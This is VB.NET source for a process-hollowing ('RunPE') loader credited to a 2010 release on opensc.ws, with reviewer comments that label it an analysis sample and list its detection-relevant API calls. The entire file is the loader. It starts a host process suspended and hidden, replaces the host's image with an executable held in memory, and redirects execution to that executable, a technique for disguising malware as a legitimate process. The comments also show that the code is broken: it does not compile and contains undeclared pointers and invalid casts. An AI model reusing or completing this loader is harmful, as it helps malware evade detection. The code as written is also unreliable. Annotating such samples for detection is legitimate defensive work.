  1. Imports System.Runtime.InteropServices
  2.  
  3. '
  4. ' * Title: CMemoryExecute.cs
  5. ' * Description: Runs an EXE in memory using native WinAPI. Very optimized and tiny.
  6. ' *
  7. ' * Developed by: affixiate
  8. ' * Release date: December 10, 2010
  9. ' * Released on: http://opensc.ws
  10. ' * Credits:
  11. ' * MSDN (http://msdn.microsoft.com)
  12. ' * NtInternals (http://undocumented.ntinternals.net)
  13. ' * Pinvoke (http://pinvoke.net)
  14. ' *
  15. ' * Comments: If you use this code, I require you to give me credits. Don't be a ripper! ;]
  16. '
  17.  
  18.  
  19. ' ReSharper disable InconsistentNaming
''' <summary>
''' Process-hollowing ("RunPE") loader: creates the host process suspended, unmaps its
''' image, writes the PE held in a byte array over that address range and redirects the
''' primary thread to the new entry point (MITRE ATT&amp;CK T1055.012, Process Hollowing).
''' Kept here as an analysis sample: as pasted it does not compile (see the notes in Run),
''' no Nt* return value is ever checked, and no process or thread handle is ever closed.
''' Detection-relevant API sequence, all issued by one caller: CreateProcess with
''' CREATE_SUSPENDED, NtUnmapViewOfSection, VirtualAllocEx with PAGE_EXECUTE_READWRITE,
''' NtWriteVirtualMemory, NtGetContextThread / NtSetContextThread, NtResumeThread.
''' </summary>
Public NotInheritable Class CMemoryExecute
    ' Static holder only; never instantiated.
    Private Sub New()
    End Sub
    ''' <summary>
    ''' Managed mirror of the Win32 STARTUPINFO passed ByRef to CreateProcess. Run populates
    ''' only dwFlags and wShowWindow; every other member keeps its default value.
    ''' </summary>
    Public Structure STARTUPINFO
        Public cb As UInteger
        Public lpReserved As String
        Public lpDesktop As String
        Public lpTitle As String
        Public dwX As UInteger
        Public dwY As UInteger
        Public dwXSize As UInteger
        Public dwYSize As UInteger
        Public dwXCountChars As UInteger
        Public dwYCountChars As UInteger
        Public dwFillAttribute As UInteger
        Public dwFlags As UInteger
        Public wShowWindow As Short
        Public cbReserved2 As Short
        Public lpReserved2 As IntPtr
        Public hStdInput As IntPtr
        Public hStdOutput As IntPtr
        Public hStdError As IntPtr
    End Structure

    ''' <summary>
    ''' Runs an EXE (which is loaded in a byte array) in memory by hollowing a freshly
    ''' created, suspended instance of <paramref name="hostProcess"/>.
    ''' </summary>
    ''' <param name="exeBuffer">The EXE buffer. It is read without bounds checks: the DOS
    ''' header, the e_lfanew offset and every section offset taken from it are trusted as-is,
    ''' so a short or malformed buffer makes Buffer.BlockCopy throw instead of returning
    ''' False.</param>
    ''' <param name="hostProcess">Full path of the host process to run the buffer in. Used as
    ''' the lpCommandLine of CreateProcess with <paramref name="optionalArguments"/> appended
    ''' after a single space; a path containing spaces is not quoted.</param>
    ''' <param name="optionalArguments">Optional command line arguments.</param>
    ''' <returns>False when the MZ or PE signature check fails or CreateProcess fails; True
    ''' once the host thread has been resumed. Failures of the Nt* calls are not reported.</returns>
    Public Shared Function Run(exeBuffer As Byte(), hostProcess As String, Optional optionalArguments As String = "") As Boolean
        ' STARTUPINFO: hidden window, standard handles flagged but left at their defaults.
        Dim StartupInfo As New STARTUPINFO()
        StartupInfo.dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
        StartupInfo.wShowWindow = SW_HIDE

        ' Scratch buffers sized to the 32-bit on-disk structures: 40-byte section header,
        ' 248-byte NT headers, 64-byte DOS header, PROCESS_INFORMATION as four Integers and
        ' a 716-byte x86 CONTEXT.
        Dim IMAGE_SECTION_HEADER = New Byte(39) {}
        ' pish
        Dim IMAGE_NT_HEADERS = New Byte(247) {}
        ' pinh
        Dim IMAGE_DOS_HEADER = New Byte(63) {}
        ' pidh
        Dim PROCESS_INFO = New Integer(3) {}
        ' pi
        Dim CONTEXT = New Byte(715) {}
        ' ctx
        ' NOTE(review): Pointer(Of T) is not a VB.NET type and p is never declared anywhere
        ' in this listing; these four assignments look like a mechanical translation of C#
        ' unsafe/fixed pointers, so the code as pasted does not compile.
        Dim pish As Pointer(Of Byte)
        pish = p

        Dim pinh As Pointer(Of Byte)
        pinh = p

        Dim pidh As Pointer(Of Byte)
        pidh = p

        Dim ctx As Pointer(Of Byte)
        ctx = p

        ' Set the flag.
        ' ContextFlags
        CType(ctx + &H0, Pointer(Of UInteger)).Target = CONTEXT_FULL

        ' Get the DOS header of the EXE.
        ' Throws (ArgumentException) rather than returning False if exeBuffer is shorter than 64 bytes.
        Buffer.BlockCopy(exeBuffer, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length)

        ' Sanity check: See if we have MZ header.

        ' e_magic
        If CType(pidh + &H0, Pointer(Of UShort)).Target <> IMAGE_DOS_SIGNATURE Then
            Return False
        End If

        ' e_lfanew comes straight from the buffer and is never range-checked.
        Dim e_lfanew = CType(pidh + &H3c, Pointer(Of Integer)).Target

        ' Get the NT header of the EXE.
        Buffer.BlockCopy(exeBuffer, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length)

        ' Sanity check: See if we have PE00 header.

        ' Signature
        If CType(pinh + &H0, Pointer(Of UInteger)).Target <> IMAGE_NT_SIGNATURE Then
            Return False
        End If

        ' Run with parameters if necessary.
        ' Note this rewrites the hostProcess parameter itself; the retry call below passes the
        ' already-extended value together with optionalArguments again, so arguments are doubled.
        If Not String.IsNullOrEmpty(optionalArguments) Then
            hostProcess += Convert.ToString(" ") & optionalArguments
        End If

        ' Host is created suspended so its image can be replaced before it runs.
        ' NOTE(review): the handles returned in PROCESS_INFO are never closed on any path.
        If Not CreateProcess(Nothing, hostProcess, IntPtr.Zero, IntPtr.Zero, False, CREATE_SUSPENDED, _
            IntPtr.Zero, Nothing, StartupInfo, PROCESS_INFO) Then
            Return False
        End If

        ' NOTE(review): DirectCast from Integer to IntPtr is not a conversion VB accepts, and
        ' PROCESS_INFO holds Integer-sized handles, so this works only as a 32-bit sketch.
        Dim ImageBase = New IntPtr(CType(pinh + &H34, Pointer(Of Integer)).Target)
        ' pi.hProcess
        NtUnmapViewOfSection(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase)
        ' pi.hProcess
        ' SizeOfImage
        ' Memory allocation failed; try again (this can happen in low memory situations)
        ' NOTE(review): the retry recurses with no limit, discards its result, leaves the
        ' suspended process created above running, and then falls through to write into the
        ' allocation that just failed.
        If VirtualAllocEx(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase, CType(pinh + &H50, Pointer(Of UInteger)).Target, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE) = IntPtr.Zero Then
            Run(exeBuffer, hostProcess, optionalArguments)
        End If
        ' pi.hProcess
        ' SizeOfHeaders
        NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase, DirectCast(p, IntPtr), CType(pinh + 84, Pointer(Of UInteger)).Target, IntPtr.Zero)

        ' NumberOfSections; the source offset below is not checked against exeBuffer.Length.
        For i As UShort = 0 To CType(pinh + &H6, Pointer(Of UShort)).Target - 1
            Buffer.BlockCopy(exeBuffer, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length)
            ' PointerToRawData
            ' pi.hProcess
            ' VirtualAddress
            ' SizeOfRawData
            NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), DirectCast(CInt(ImageBase) + CType(pish + &Hc, Pointer(Of UInteger)).Target, IntPtr), DirectCast(p, IntPtr), CType(pish + &H10, Pointer(Of UInteger)).Target, IntPtr.Zero)
        Next

        ' pi.hThread
        ' Return values of the three context calls are discarded, so a failed context write
        ' still resumes the host thread.
        NtGetContextThread(DirectCast(PROCESS_INFO(1), IntPtr), DirectCast(ctx, IntPtr))
        ' pi.hProcess
        ' ecx
        NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), DirectCast(CType(ctx + &Hac, Pointer(Of UInteger)).Target, IntPtr), ImageBase, &H4, IntPtr.Zero)
        ' eax
        ' AddressOfEntryPoint
        CType(ctx + &Hb0, Pointer(Of UInteger)).Target = CUInt(ImageBase) + CType(pinh + &H28, Pointer(Of UInteger)).Target
        ' pi.hThread
        NtSetContextThread(DirectCast(PROCESS_INFO(1), IntPtr), DirectCast(ctx, IntPtr))
        ' pi.hThread
        NtResumeThread(DirectCast(PROCESS_INFO(1), IntPtr), IntPtr.Zero)


        Return True
    End Function

    #Region "WinNT Definitions"

    ' 32-bit throughout: the header offsets used in Run are those of the PE32 headers, the
    ' CONTEXT buffer is the x86 size and handles are carried as Integers.
    Private Const CONTEXT_FULL As UInteger = &H10007
    Private Const CREATE_SUSPENDED As Integer = &H4
    Private Const MEM_COMMIT As Integer = &H1000
    Private Const MEM_RESERVE As Integer = &H2000
    Private Const PAGE_EXECUTE_READWRITE As Integer = &H40
    Private Const IMAGE_DOS_SIGNATURE As UShort = &H5a4d
    ' MZ
    Private Const IMAGE_NT_SIGNATURE As UInteger = &H4550
    ' PE00
    ' Not Const, and never referenced.
    Private Shared SW_SHOW As Short = 5
    ' Not Const; used by Run.
    Private Shared SW_HIDE As Short = 0
    Private Const STARTF_USESTDHANDLES As UInteger = &H100
    Private Const STARTF_USESHOWWINDOW As UInteger = &H1


    #Region "WinAPI"
    ' The ntdll.dll entries below are undocumented native APIs returning NTSTATUS; Run discards
    ' every return value, and SetLastError has no effect for them.
    <DllImport("kernel32.dll", SetLastError := True)> _
    Private Shared Function CreateProcess(lpApplicationName As String, lpCommandLine As String, lpProcessAttributes As IntPtr, lpThreadAttributes As IntPtr, bInheritHandles As Boolean, dwCreationFlags As UInteger, _
        lpEnvironment As IntPtr, lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, lpProcessInfo As Integer()) As Boolean
    End Function

    <DllImport("kernel32.dll", SetLastError := True)> _
    Private Shared Function VirtualAllocEx(hProcess As IntPtr, lpAddress As IntPtr, dwSize As UInteger, flAllocationType As UInteger, flProtect As UInteger) As IntPtr
    End Function

    <DllImport("ntdll.dll", SetLastError := True)> _
    Private Shared Function NtUnmapViewOfSection(hProcess As IntPtr, lpBaseAddress As IntPtr) As UInteger
    End Function

    <DllImport("ntdll.dll", SetLastError := True)> _
    Private Shared Function NtWriteVirtualMemory(hProcess As IntPtr, lpBaseAddress As IntPtr, lpBuffer As IntPtr, nSize As UInteger, lpNumberOfBytesWritten As IntPtr) As Integer
    End Function

    <DllImport("ntdll.dll", SetLastError := True)> _
    Private Shared Function NtGetContextThread(hThread As IntPtr, lpContext As IntPtr) As Integer
    End Function

    <DllImport("ntdll.dll", SetLastError := True)> _
    Private Shared Function NtSetContextThread(hThread As IntPtr, lpContext As IntPtr) As Integer
    End Function

    <DllImport("ntdll.dll", SetLastError := True)> _
    Private Shared Function NtResumeThread(hThread As IntPtr, SuspendCount As IntPtr) As UInteger
    End Function
    #End Region

    #End Region
End Class